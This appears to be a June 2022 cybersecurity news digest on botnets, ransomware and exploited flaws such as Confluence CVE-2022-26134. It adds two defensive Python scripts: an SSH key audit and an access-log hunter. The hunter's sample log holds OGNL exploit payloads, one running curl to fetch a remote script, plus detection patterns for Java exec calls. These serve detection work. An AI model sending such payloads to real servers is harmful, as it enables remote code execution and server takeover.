    Security researchers at Akamai uncovered a new Golang-based peer-to-peer (P2P) botnet that has been actively targeting Linux servers in the education sector. Dubbed Panchan, the botnet was first spotted by Akamai on March 19, 2022. Since its emergence in March, Panchan has infected 209 systems, 40 of which are currently active. Most of the compromised machines are located in Asia (64), followed by Europe (52), North America (45), South America (11), Africa (1), and Oceania (1). According to the researchers, Panchan “utilizes its built-in concurrency features to maximize spreadability and execute malware modules” and harvests SSH keys to perform lateral movement. Panchan’s approach to harvesting SSH keys is unusual. Unlike other botnets, which simply brute-force or run dictionary attacks against random IP addresses, Panchan also “reads the id_rsa and known_hosts files to harvest existing credentials and uses them to move laterally across the network.” That combination works because a passphrase-less private key plus an unhashed known_hosts file gives the malware both a credential and a ready-made list of hosts it is likely accepted on.
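    The two conditions that make the harvesting described above cheap are auditable on any host. The following is an added example, not code from Akamai's analysis or from the botnet: it walks a ~/.ssh directory, reports private keys stored without a passphrase (checking both the OpenSSH key container and legacy PEM keys) and lists the hosts that a plaintext known_hosts file gives away. The key files and known_hosts it writes into a temporary directory are constructed stand-ins; the key blobs hold dummy bytes, not real key material.

```python
"""Audit ~/.ssh for passphrase-less keys and unhashed known_hosts (added example, see lead-in)."""
import base64
import os
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _pem_body(text):
    return base64.b64decode("".join(line for line in text.splitlines() if not line.startswith("-----")))


def private_key_is_encrypted(text):
    """Handle both key container formats ssh-keygen writes."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        blob = _pem_body(text)
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("malformed OpenSSH key")
        offset = len(OPENSSH_MAGIC)
        (length,) = struct.unpack_from(">I", blob, offset)
        cipher = blob[offset + 4:offset + 4 + length]   # first field after the magic is the cipher name
        return cipher != b"none"
    # Legacy PEM keys (ssh-keygen -m PEM) mark encryption with a Proc-Type header.
    return "Proc-Type: 4,ENCRYPTED" in text


def plaintext_known_hosts(text):
    """Return host names/addresses stored unhashed; hashed entries start with '|1|'."""
    hosts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host_field = fields[1] if fields[0].startswith("@") else fields[0]  # skip @cert-authority / @revoked
        if host_field.startswith("|1|"):
            continue
        hosts.extend(host_field.split(","))
    return hosts


def audit_ssh_dir(ssh_dir):
    """Report passphrase-less private keys and unhashed known_hosts entries under ssh_dir."""
    findings = {"unencrypted_keys": [], "plaintext_known_hosts": []}
    for name in sorted(os.listdir(ssh_dir)):
        path = os.path.join(ssh_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        if name == "known_hosts":
            findings["plaintext_known_hosts"] = plaintext_known_hosts(text)
        elif "PRIVATE KEY-----" in text and not private_key_is_encrypted(text):
            findings["unencrypted_keys"].append(name)
    return findings


def fake_openssh_key(cipher):
    """Constructed stand-in for an OpenSSH private key: valid preamble, dummy key bytes."""
    kdf = b"none" if cipher == b"none" else b"bcrypt"
    blob = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(b"")
            + struct.pack(">I", 1) + _ssh_string(b"\x00" * 32) + _ssh_string(b"\x00" * 64))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_KNOWN_HOSTS = """# constructed sample
web01.internal,10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDummyKeyMaterialForTheExample
@cert-authority *.lab.internal ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDummyCertificateAuthorityKey
|1|LkFBQkJDQ0REPQ==|UXlZWlZXV1ZXVg== ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDummyHashedEntry
"""


def build_sample_ssh_dir():
    """Write the constructed key files and known_hosts into a temp dir and return its path."""
    ssh_dir = tempfile.mkdtemp(prefix="ssh-audit-")
    samples = {
        "id_rsa": fake_openssh_key(b"none"),            # no passphrase: usable as harvested
        "id_ed25519": fake_openssh_key(b"aes256-ctr"),  # passphrase-protected
        "known_hosts": SAMPLE_KNOWN_HOSTS,
    }
    for name, content in samples.items():
        with open(os.path.join(ssh_dir, name), "w", encoding="utf-8") as fh:
            fh.write(content)
    return ssh_dir


if __name__ == "__main__":
    print(audit_ssh_dir(build_sample_ssh_dir()))
```

    Run against a real account with audit_ssh_dir(os.path.expanduser("~/.ssh")). Remediation for what it reports is routine: add a passphrase (ssh-keygen -p), hash the file in place (ssh-keygen -H) and set HashKnownHosts yes so new entries are hashed too.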

    Citrix Warns Critical Bug Can Let Attackers Reset Admin Passwords

    Citrix on Tuesday released a security advisory warning its customers of a critical vulnerability in Citrix Application Delivery Management that can let unauthenticated attackers log in as administrator and reset the admin password. Citrix ADM is a web-based solution that provides admins with a centralized cloud-based console for managing on-premises or cloud Citrix deployments, including Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix Secure Web Gateway.

    Microsoft: June Windows Server Updates May Cause Backup Issues

    Microsoft says that some applications might fail to back up data using the Volume Shadow Copy Service (VSS) after the June 2022 Patch Tuesday Windows updates are applied. The issue occurs due to security enforcement introduced to address an elevation of privilege vulnerability (CVE-2022-30154) in the Microsoft File Server Shadow Copy Agent Service (RVSS). On systems where this known issue occurs, Windows backup applications may receive E_ACCESSDENIED errors during shadow copy creation, and a "FileShareShadowCopyAgent Event 1013" will be logged on the file server. "Since RVSS is an optional component, Windows Server systems are not vulnerable by default. Additionally, Windows Client editions are not vulnerable to attacks using CVE-2022-30154 exploits in privilege escalation attempts."

    Ransomware Gang Creates Site for Employees to Search for Their Stolen Data

    The ALPHV ransomware gang, aka BlackCat, has brought extortion to a new level by creating a dedicated website that allows the customers and employees of a victim to check whether their data was stolen in an attack. The ransomware operators today released data stolen from a hotel and spa in Oregon. The group claims to have taken 112 GB of data, including employee information and social security numbers for 1,500 employees. Instead of simply leaking the data on their Tor data leak site, the group created a dedicated website allowing both customers and employees to check if their data was stolen during the attack. Using this site, employees, customers, or anyone else can see information about hotel guests and their stays or the personal data of 1,534 employees.

    Microsoft: Exchange Servers Hacked to Deploy BlackCat Ransomware

    Microsoft says BlackCat ransomware affiliates are now attacking Microsoft Exchange servers using exploits targeting unpatched vulnerabilities. In at least one incident that Microsoft's security experts observed, the attackers slowly moved through the victim's network, stealing credentials and exfiltrating information to be used for double extortion. Two weeks after the initial compromise using an unpatched Exchange server as an entry vector, the threat actor deployed BlackCat ransomware payloads across the network via PsExec.

    Researchers Detail PureCrypter Loader Cyber Criminals Using to Distribute Malware

    Cybersecurity researchers have detailed the workings of a fully-featured malware loader dubbed PureCrypter that's being purchased by cybercriminals to deliver remote access trojans (RATs) and information stealers. "The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption, and obfuscation to evade antivirus software products," Zscaler's Romain Dumont said in a new report.

    Cloudflare Mitigates Record-Breaking HTTPS DDoS Attack

    Internet infrastructure firm Cloudflare said today that it mitigated a 26 million request per second distributed denial-of-service (DDoS) attack, the largest HTTPS DDoS attack detected to date. The record-breaking attack occurred last week and targeted one of Cloudflare's customers using the Free plan. The threat actor behind it likely used hijacked servers and virtual machines seeing that the attack originated from Cloud Service Providers instead of weaker Internet of Things (IoT) devices from compromised Residential Internet Service Providers.

    Iranian Spear-Phishing Operation Targets Former Israeli and US High-Ranking Officials

    Check Point Research has uncovered a recent Iranian spear-phishing operation aimed at former Israeli officials, high-ranking military personnel, research fellows at research institutions and think tanks, and Israeli citizens. The attacks use a custom phishing infrastructure as well as a wide array of fake email accounts to impersonate trusted parties. To establish deeper trust with new targets, the threat actors took over some victims’ inboxes and then hijacked existing email conversations, starting attacks from an existing thread between a target and a trusted party and continuing that conversation in that guise.

    Microsoft Mitigates RCE Vulnerability Affecting Azure Synapse and Data Factory

    Microsoft has incorporated additional improvements to address the recently disclosed SynLapse security vulnerability in order to meet comprehensive tenant isolation requirements in Azure Data Factory and Azure Synapse Pipelines. The latest safeguards include moving the shared integration runtimes to sandboxed ephemeral instances and using scoped tokens to prevent adversaries from using a client certificate to access other tenants' information.

    Hello XD Ransomware Now Drops a Backdoor While Encrypting

    Cybersecurity researchers report increased activity of the Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption. Hello XD was first spotted in the wild in November 2021 and is based on the leaked source code of another ransomware known as Babuk. Unlike other ransomware groups, this particular ransomware family does not have a data leak site. Rather, it directs the impacted victim to negotiations through Tox chat and onion-based messenger instances.

    Russian Hackers Start Targeting Ukraine With Follina Exploits

    Ukraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. The security issue can be triggered by either opening or selecting a specially crafted document and threat actors have been exploiting it in attacks since at least April 2022.

    New Syslogk Linux Rootkit Uses Magic Packets to Trigger Backdoor

    A new Linux rootkit named ‘Syslogk’ is being used in attacks to hide malicious processes, using specially crafted "magic packets" to awaken a backdoor lying dormant on the device. The malware is currently under heavy development, and its authors appear to base their project on Adore-Ng, an old open-source rootkit. Syslogk can force-load its modules into the Linux kernel (3.x kernels are supported), hide directories and network traffic, and eventually load a backdoor called ‘Rekoobe.’

    Confluence Servers Hacked to Deploy AvosLocker, Cerber2021 Ransomware

    Ransomware gangs are now targeting a recently patched and actively exploited remote code execution (RCE) vulnerability affecting Atlassian Confluence Server and Data Center instances for initial access to corporate networks. If successfully exploited, this OGNL injection vulnerability (CVE-2022-26134) enables unauthenticated attackers to take over unpatched servers remotely by creating new admin accounts and executing arbitrary code.

    GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPul

    A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa. Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017.

    Hackers Exploit Recently Patched Confluence Bug for Cryptomining

    Security researchers at Check Point recently observed a crypto-mining group known as the “8220 gang” exploiting a code execution flaw in Atlassian Confluence servers to install miners on vulnerable servers. "The vulnerability, tracked as CVE-2022-26134, was discovered as an actively exploited zero-day at the end of May, while the vendor released a fix on June 3, 2022. Various proof of concept (PoC) exploits were released in the days that followed, giving a broader base of malicious actors an easy way to exploit the flaw for their purposes.”
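    Both the ransomware deployments and the 8220 gang's cryptomining above start from the same CVE-2022-26134 request, which makes access logs the quickest place to look for who tried. The following is an added example, not code from Check Point, Atlassian or either group: the public exploit carries the OGNL expression in the request path, so the check URL-decodes each path (repeatedly, to catch double encoding) and flags paths containing an OGNL expression wrapper, noting whether the payload reaches for Java's Runtime/ProcessBuilder. The log lines are constructed samples in combined log format.

```python
"""Hunt for CVE-2022-26134 exploitation attempts in Confluence access logs (added example, see lead-in)."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Expression wrappers OGNL evaluates, and the reflection calls in-the-wild payloads lean on.
OGNL_MARKERS = ("${", "#{")
EXEC_HINTS = ("java.lang.runtime", "getruntime", ".exec(", "processbuilder", "@java.")


def fully_decode(path, max_rounds=3):
    """Undo percent-encoding until the string stops changing (bounded, so %25-spam cannot loop forever)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def inspect_request(src, path, status):
    """Return a finding for one request, or None if the path carries no OGNL wrapper."""
    decoded = fully_decode(path)
    if not any(marker in decoded for marker in OGNL_MARKERS):
        return None
    lowered = decoded.lower()
    return {
        "src": src,
        "status": status,
        "decoded_path": decoded,
        "double_encoded": unquote(path) != decoded,
        "code_execution": any(hint in lowered for hint in EXEC_HINTS),
    }


def scan_access_log(lines):
    """Parse each line and collect the suspicious ones, preserving log order."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        finding = inspect_request(match["src"], match["path"], int(match["status"]))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log: a single-encoded attempt, a benign page view, and a double-encoded attempt.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2022:10:15:01 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22curl%20198.51.100.9/x.sh%22%29%7D/ HTTP/1.1" 302 0 "-" "python-requests/2.27"',
    '198.51.100.23 - - [03/Jun/2022:10:16:44 +0000] "GET /display/ENG/Runbook?preview=/123/456/plan.pdf HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [03/Jun/2022:10:17:09 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522id%2522%2529%257D/ HTTP/1.1" 302 0 "-" "curl/7.81"',
]


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

    A hit tells you an attempt was made, not that it succeeded; treat any hit against a server that was unpatched at the time as a compromise to investigate, and pair the search with a look for unexpected child processes of the Confluence Java process.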

    Researchers Detail How Cyber Criminals Are Targeting Cryptocurrency Users

    Cybercriminals are impersonating popular crypto platforms such as Binance, Celo, and Trust Wallet with spoofed emails and fake login pages in an attempt to steal login details and deceptively transfer virtual funds. "As cryptocurrency and non-fungible tokens (NFTs) become more mainstream, and capture headlines for their volatility, there is a greater likelihood of more individuals falling victim to fraud attempting to exploit people for digital currencies," Proofpoint said in a new report.

    Researchers Disclose Critical Flaws in Industrial Access Control System from Carrier

    Multiple vulnerabilities were disclosed in Carrier’s LenelS2 Mercury access control system that’s used widely in healthcare, education, transportation, and government facilities. LenelS2 is employed in environments to grant physical access to privileged facilities and can be integrated with more complex building automation deployments. A total of 8 vulnerabilities were disclosed which relate to a protection mechanism failure, forced browsing, buffer overflow, path traversal, and OS command injection. According to the security advisory published by CISA, successful exploitation of these vulnerabilities could allow an attacker access to the device, allowing monitoring of all communications sent to and from the device, modification of onboard relays, changing of configuration files, device instability, and a denial-of-service condition.

    Bizarre Ransomware Sells Decryptor on Roblox Game Pass Store

    A new ransomware is taking the unusual approach of selling its decryptor on the Roblox gaming platform using the service's in-game Robux currency. Today, security researcher MalwareHunterTeam found the ransomware, named 'WannaFriendMe', which impersonates the notorious Ryuk ransomware but is in reality a variant of the Chaos ransomware. Roblox is an online kids’ gaming platform where members can create their own games and monetize them by selling Game Passes, which provide in-game items, special access, or enhanced features. To pay for these Game Passes, members must purchase them using an in-game currency called Robux.

    Phishing Hits All-Time High in Q1 2022

    “The first quarter of 2022 saw phishing attacks hit a record high, topping one million for the first time, according to data from the Anti Phishing Working Group (APWG)” (Info Security Magazine, 2022). The group released the details in their Phishing Activity Trends Report. March apparently was the worst month with 384,000 attacks.

    Chinese Hacking Group Aoqin Dragon Quietly Spied Orgs for a Decade

    A previously unknown Chinese-speaking threat actor has been discovered by threat analysts SentinelLabs who were able to link it to malicious activity going as far back as 2013. Named Aoqin Dragon, the hacking group is focused on cyber-espionage, targeting government, education, and telecommunication organizations based in Singapore, Hong Kong, Vietnam, Cambodia, and Australia.

    New Emotet Variant Stealing Users' Credit Card Information from Google Chrome

    The notorious Emotet malware has turned to deploy a new module designed to siphon credit card information stored in the Chrome web browser. The credit card stealer, which exclusively singles out Chrome, has the ability to exfiltrate the collected information to different remote command-and-control (C2) servers, according to enterprise security company Proofpoint, which observed the component on June 6.

    Vice Society Ransomware Claims Attack on Italian City of Palermo

    The Vice Society ransomware group has claimed responsibility for the recent cyber attack on the city of Palermo in Italy, which has caused a large-scale service outage. The attack occurred last Friday, and all internet-relying services remain unavailable, impacting 1.3 million people and many tourists visiting the city.

    The Most Dangerous Attacks of 2022

    The 2022 edition was a bit more somber than past editions, following the passing of SANS founder Alan Paller who moderated the panel for over a decade. Ed Skoudis, fellow and director at SANS Institute, started the 2022 panel with a moving tribute to Paller, who was mentioned more than once during the session as the inspiration for how cybersecurity education can and should continue to improve.

    New Symbiote Malware Infects All Running Processes on Linux Systems

    This novel threat was discovered and analyzed by BlackBerry and Intezer Labs researchers, who worked together to uncover all aspects of the new malware in a detailed technical report. According to them, Symbiote has been under active development since last year. In recent attacks, the malware has gained new capabilities that infect all running processes on compromised systems, steal account credentials, and give its operators backdoor access: “The new malware is primarily used for automated credential harvesting from hacked Linux devices by hooking the "libc read" function. This is a crucial mission when targeting Linux servers in high-value networks, as stealing admin account credentials opens the way to unobstructed lateral movement and unlimited access to the entire system.”

    Linux Version of Black Basta Ransomware Targets VMware ESXi servers

    Threat research analysts at Uptycs uncovered new Black Basta ransomware binaries which revealed that the ransomware gang now supports the encryption of VMware ESXi virtual machines running on enterprise Linux servers. “Most ransomware groups are now focusing their attacks on ESXi VMs since this tactic aligns with their enterprise targeting. It also makes it possible to take advantage of faster encryption of multiple servers with a single command. Encrypting VMs makes sense since many companies have recently migrated to virtual machines as they allow for easier device management and a lot more efficient resource usage.”

    Poisoned CCleaner Search Results Spread Information-Stealing Malware

    Malware that steals your passwords, credit cards, and crypto wallets is being promoted through search results for a pirated copy of the CCleaner Pro Windows optimization program. This new malware distribution campaign is dubbed “FakeCrack,” and was discovered by analysts at Avast, who report detecting an average of 10,000 infection attempts every day from its customer telemetry data. Most of these victims are based in France, Brazil, Indonesia, and India. The malware distributed in this campaign is a powerful information stealer that can harvest personal data and cryptocurrency assets and route internet traffic through data-snatching proxies.

    US Seizes SSNDOB Market for Selling Personal Info of 24 Million People

    On Tuesday, the U.S. Department of Justice announced the shutdown of SSNDOB, an illicit online marketplace that sold the names, Social Security numbers, and dates of birth of approximately 24 million U.S. people. The operation was conducted by the FBI, the Internal Revenue Service, and the Department of Justice, with significant help from the Cyprus Police. In total, four domains hosting the SSNDOB marketplace were seized: SSNDOB[.]club, SSNDOB[.]vip, SSNDOB[.]ws, and blackjob[.]biz.

    New ‘Dogwalk’ Windows Zero-Day Bug Gets Free Unofficial Patches

    This vulnerability was first publicly disclosed by security researchers in January 2020 after Microsoft replied to reports saying they wouldn't provide a fix because it was not a security issue. However, the bug was recently re-discovered and brought to public attention by security researcher j00sean. The security flaw (jokingly dubbed DogWalk) is a path traversal flaw attackers can exploit to copy an executable to the Windows Startup folder when the target opens a maliciously crafted .diagcab file (received via email or downloaded from the web). While Microsoft said that Outlook users are not at risk because .diagcab files are automatically blocked, security researchers and experts argue that exploiting this bug is still a valid attack vector.

    Chinese Government Hackers Breached Telcos to Snoop on Network Traffic

    Several US federal agencies today revealed that Chinese-backed threat actors have targeted and compromised major telecommunications companies and network service providers to steal credentials and harvest data. The NSA, CISA, and the FBI released a joint cybersecurity advisory Tuesday evening. Chinese threat actors are exploiting known vulnerabilities in home office routers, and even targeting those used in medium and large enterprises. The compromised devices are used as command and control servers and proxy systems, which allow the threat actors to move laterally to other networks.

    Researchers Warn of Spam Campaign Targeting Victims with SVCReady Malware

    Researchers at HP have spotted a new wave of phishing campaigns spreading a previously documented malware dubbed “SVCReady.” SVCReady is said to be in its early stage of development, with the authors iteratively updating the malware several times last month. First signs of activity date back to April 22, 2022. SVCReady is commonly spread via emails containing macro-laced Word documents. Upon opening these documents, victims are prompted to enable macros by clicking on the “Enable Content” button. In turn, this activates the deployment of malicious payloads.

    QBot Now Pushes Black Basta Ransomware in Bot-Powered Attacks

    Researchers at the NCC Group discovered a new partnership between the Black Basta ransomware group and the Qakbot malware operation during a recent incident response. QBot (Qakbot) is Windows malware that steals bank credentials and Windows domain credentials, and delivers further malware payloads on infected devices. Victims usually become infected with Qbot via phishing attacks with malicious attachments. Even though it started as a banking trojan, it has had numerous collaborations with other ransomware gangs, including MegaCortex, ProLock, DoppelPaymer, and Egregor.

    Shields Health Care Group Data Breach Affects 2 Million Patients

    Shields Health Care Group (Shields) suffered a data breach that exposed the data of approximately 2,000,000 people in the United States after hackers breached its network and stole data. Shields is a Massachusetts-based medical services provider specializing in MRI and PET/CT diagnostic imaging, radiation oncology, and ambulatory surgical services. According to a data breach notification published on the company's site, Shields became aware of the cyberattack on March 28, 2022, and hired cybersecurity specialists to determine the scope of the incident.

    Cisco Firepower Threat Defense Snort Memory Leak DoS

    It was disclosed a while back that Cisco FTD Software was affected by a denial of service vulnerability; an advisory from Nessus today notes that Cisco FTD/Snort is susceptible to DoS attacks stemming from the same flaw: “A denial of service (DoS) vulnerability exists in the way the Snort detection engine processes ICMP traffic. An unauthenticated, remote attacker can exploit this issue by sending a series of ICMP packets which can cause the device to stop responding.”

    The Costs and Damages of DNS Attacks

    Security company EfficientIP released its eighth annual Global DNS Threat Report. The focus of the report is Domain Name System (DNS) attacks and their impacts on global organizations over the past 12 months. “The report uncovers how despite 73% of organizations knowing that DNS security is critical to their business, cyber criminals are still infiltrating the network and causing significant business disruption, resulting in the shutdown of cloud and on-premise applications and theft of data. As enterprises continue to strike a balance between supporting remote workers and mitigating the network security risks posed by the rise in hybrid work models and reliance on cloud applications, the results show that 88% of organizations have experienced one or more DNS attacks on their business. Each successful attack costs the business, on average, $942,000.”

    Another Nation-state Actor Exploits Microsoft Follina to Attack European and US Entities

    An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability in attacks aimed at government entities in Europe and the U.S. Follina, tracked as CVE-2022-30190, resides in Microsoft Office and is a zero-day vulnerability yet to be patched, though several workarounds are available. In an advisory released by Microsoft, they say, “A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.”

    Exploit Released for Atlassian Confluence RCE Bug, Patch Now

    Proof-of-concept exploits for the actively exploited critical CVE-2022-26134 vulnerability impacting Atlassian Confluence and Data Center servers have been widely released this weekend. “The vulnerability tracked as CVE-2022-26134 is a critical unauthenticated, remote code execution vulnerability exploited through OGNL injection and impacts all Atlassian Confluence and Data Center 2016 servers after version 1.3.0.”

    Evasive Phishing Mixes Reverse Tunnels and URL Shortening Services

    Security researchers are seeing an uptick in the use of reverse tunnel services along with URL shorteners for large-scale phishing campaigns, making the malicious activity more difficult to stop. This practice deviates from the more common method of registering domains with hosting providers, who are likely to respond to complaints and take down the phishing sites.

    Closing the Door: DeadBolt Ransomware Locks Out Vendors With Multitiered Extortion Scheme

    The DeadBolt ransomware kicked off 2022 with a slew of attacks that targeted internet-facing Network-Attached Storage (NAS) devices. It was first seen targeting QNAP Systems, Inc. in January 2022. According to a report from attack surface solutions provider Censys.io, as of Jan. 26, 2022, out of 130,000 QNAP NAS devices that were potential targets, 4,988 services showed signs of a DeadBolt infection. A few weeks later, ASUSTOR, another NAS device and video surveillance solutions vendor, also experienced DeadBolt ransomware attacks that targeted an unknown number of its devices. In March, DeadBolt attackers once again targeted QNAP devices; according to Censys.io, the number of infections reached 1,146 by March 19, 2022. Most recently, on May 19, 2022, QNAP released a product security update stating that internet-connected QNAP devices were once again being targeted by DeadBolt, this time aiming at NAS devices using QTS 4.3.6 and QTS 4.4.1.

    Atlassian Fixes Confluence Zero-Day Widely Exploited in Attacks

    The company has now released patches and advises all customers to upgrade their appliances to versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1, which contain a fix for this flaw. Admins who cannot immediately upgrade their Confluence installs can also use a temporary workaround to mitigate the CVE-2022-26134 security bug by updating some JAR files on their Confluence servers.

    Microsoft Disrupts Bohrium Hackers’ Spear-Phishing Operation

    The Microsoft Digital Crimes Unit (DCU) has disrupted a spear-phishing operation linked to an Iranian threat actor tracked as Bohrium that targeted customers in the U.S., Middle East, and India. Bohrium has targeted organizations from a wide range of industry sectors, including tech, transportation, government, and education, according to Amy Hogan-Burney, the General Manager of Microsoft DCU.

    GitLab Security Update Fixes Critical Account Takeover Flaw

    GitLab has released a critical security update for multiple versions of its Community and Enterprise Edition products to address eight vulnerabilities, one of which allows account takeover. Tracked as CVE-2022-1680 and rated with a critical severity score of 9.9, the vulnerability affects all GitLab versions 11.10 through 14.9.4, 14.10 through 14.10.3, and version 15.0.

    Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies

    Microsoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium. The adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022. In addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications the group had created and that it notified affected organizations.

    Ransomware Gang Now Hacks Corporate Websites to Show Ransom Notes

    A ransomware gang is taking extortion to a new level by hacking corporate websites to publicly display ransom notes. This new extortion strategy is being conducted by Industrial Spy, a data extortion gang that recently began using ransomware as part of its attacks. As part of these attacks, Industrial Spy will breach networks, steal data, and deploy ransomware on devices. The threat actors then threaten to sell the stolen data on their Tor marketplace if a ransom is not paid.

    Critical Atlassian Confluence Zero-Day Actively Used in Attacks

    Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time. On Thursday, Atlassian released a security advisory disclosing that CVE-2022-26134 is a critical unauthenticated, remote code execution vulnerability present in both Confluence Server and Data Center. Atlassian says that it confirmed the vulnerability in Confluence Server 7.18.0 and believes that Confluence Server and Data Center 7.4.0 and higher are also vulnerable.

    Critical UNISOC Chip Vulnerability Affects Millions of Android Smartphones

    UNISOC, a semiconductor company based in Shanghai, is the world's fourth-largest mobile processor manufacturer after Mediatek, Qualcomm, and Apple, accounting for 10% of all SoC shipments in Q3 2021, according to Counterpoint Research. A critical security flaw has been uncovered in UNISOC's smartphone chipset that could be potentially weaponized to disrupt a smartphone's radio communications through a malformed packet. "Left unpatched, a hacker or a military unit can leverage such a vulnerability to neutralize communications in a specific location," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "The vulnerability is in the modem firmware, not in the Android OS itself."

    DOJ Seizes 3 Web Domains Used to Sell Stolen Data and DDoS Services

    The FBI and U.S. Department of Justice (DoJ) announced on Wednesday the seizure of three domains used by cybercriminals to trade stolen personal information and facilitate distributed denial-of-service (DDoS) attacks for hire. The three domains seized include weleakinfo[.]to, ipstress[.]in, and ovh-booter[.]com. Weleakinfo[.]to allowed its users to traffic hacked personal data and offered a searchable database containing illegally amassed information obtained from over 10,000 data breaches. The database consisted of seven billion indexed records featuring names, email addresses, usernames, phone numbers, and passwords for online accounts that could be accessed through different subscription tiers.

    Cybercriminals Hold 1,200 Unsecured Elasticsearch Databases for Ransom

    Security researchers at Secureworks have uncovered a new campaign targeting poorly secured Elasticsearch databases to replace their data with a ransom note. Over 1,200 databases that could be accessed without authentication have already fallen victim to the attackers. So far Secureworks has identified 450 individual requests for ransom payments demanding 0.012 Bitcoin in exchange for the data. In total, the ransom requests amount to roughly $280,000.

    Conti Ransomware Targeted Intel Firmware for Stealthy Attacks

    Researchers analyzing the leaked chats of the notorious Conti ransomware operation have discovered that teams inside the Russian cybercrime group were actively developing firmware hacks. According to messages exchanged between members of the cybercrime syndicate, Conti developers had created proof-of-concept (PoC) code that leveraged Intel’s Management Engine (ME) to overwrite flash and gain SMM (System Management Mode) execution.

    Microsoft Office Apps are Vulnerable to IDN Homograph Attacks

    Microsoft Office apps – including Outlook and Teams – are vulnerable to homograph attacks based on internationalized domain names (IDNs). In practice, this means that users hovering above a link in a phishing email, a Word or Excel document they have received, or a message sent via Teams, can’t tell that it will direct them to a spoofed malicious domain that’s not what it purports to be.

    Windows MSDT Zero-Day Now Exploited by Chinese APT Hackers

    Chinese-linked APT group TA413 is now actively exploiting the Microsoft Office zero-day vulnerability (known as 'Follina') to execute malicious code remotely on Windows systems. Tracked as CVE-2022-30190, the remote code execution flaw impacts all Windows client and server platforms still receiving security updates (Windows 7 or later and Windows Server 2008 or later).

    Costa Rica’s Public Health Agency Hit by Hive Ransomware

    Costa Rica’s public health service (known as the Costa Rican Social Security Fund or CCSS) was hit by a Hive ransomware attack yesterday, forcing its computer systems offline. Hive, a Ransomware-as-a-Service (RaaS) operation active since at least June 2021, has been behind attacks on over 30 organizations, counting only the victims who refused to pay the ransom and had their data leaked online.

    New XLoader Botnet Uses Probability Theory to Hide Its Servers

    Threat analysts have spotted a new version of the XLoader botnet malware that uses probability theory to hide its command and control servers, making it difficult to disrupt the malware's operation. This helps the malware operators continue using the same infrastructure without the risk of losing nodes due to blocks on identified IP addresses while also reducing the chances of being tracked and identified.

    Sidewinder Hackers Plant Fake Android VPN App in Google Play Store

    Phishing campaigns attributed to an advanced threat actor called SideWinder involved a fake VPN app for Android devices published on the Google Play Store along with a custom tool that filters victims for better targeting. SideWinder is an APT group that’s been active since at least 2012, believed to be an actor of Indian origin with a relatively high level of sophistication. Security researchers at Kaspersky attributed close to 1,000 attacks to this group in the past two years. Among its primary targets are organizations in Pakistan, China, Nepal, and Afghanistan. The adversary relies on a fairly large infrastructure that includes more than 92 IP addresses, mainly for phishing attacks, hosting hundreds of domains and subdomains used as command and control servers.

    FluBot Android Malware Operation Shutdown by Law Enforcement

